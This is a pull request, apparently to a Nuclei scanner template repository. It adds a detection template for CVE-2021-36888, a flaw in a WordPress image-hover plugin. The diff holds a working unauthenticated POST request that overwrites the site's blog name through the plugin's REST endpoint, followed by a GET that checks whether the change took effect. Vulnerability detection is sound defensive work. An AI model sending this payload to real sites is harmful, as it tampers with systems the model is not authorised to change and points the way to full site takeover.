### PR TITLE
Add CVE-2021-36888 (Updated CVEs)

### DIFF
--- a/http/cves/2021/CVE-2021-36888.yaml
+++ b/http/cves/2021/CVE-2021-36888.yaml
@@ -6,8 +6,13 @@ info:
   severity: critical
   description: |
     Unauthenticated Arbitrary Options Update vulnerability leading to full website compromise discovered in Image Hover Effects Ultimate (versions <= 9.6.1) WordPress plugin.
+  impact: |
+    Attackers can fully compromise the website, leading to complete control and potential data theft or defacement.
+  remediation: |
+    Update to the latest version of the plugin, newer than 9.6.1.
   reference:
     - https://wpscan.com/vulnerability/75da4102-7063-407f-975e-28be6ed33aac/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36888
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -17,27 +22,36 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2021,wpscan,wp-plugin,wordpress,imagehover,rest-api,unauth,kev,vkev
+  tags: cve,cve2021,wpscan,wp-plugin,wordpress,imagehover,intrusive,unauth,kev,vkev
 
 variables:
   rand: "{{randstr}}"
 
-requests:
+flow: http(1) && http(2)
+
+http:
   - raw:
       - |
         POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
-        Accept-Language: en-GB,en;q=0.5
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         X-Requested-With: XMLHttpRequest
-        Connection: close
 
         rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22{{rand}}%22%7D
 
-  - method: GET
-    path:
-      - "{{BaseURL}}"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "oxi-confirmation-success")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
       - type: dsl
         dsl:


### PR DESCRIPTION
### ADD CVE-2021-36888

Unauthenticated Arbitrary Options Update vulnerability leading to full website compromise discovered in Image Hover Effects Ultimate (versions <= 9.6.1) WordPress plugin.

- References:
    - https://wpscan.com/vulnerability/75da4102-7063-407f-975e-28be6ed33aac/


### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)


### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
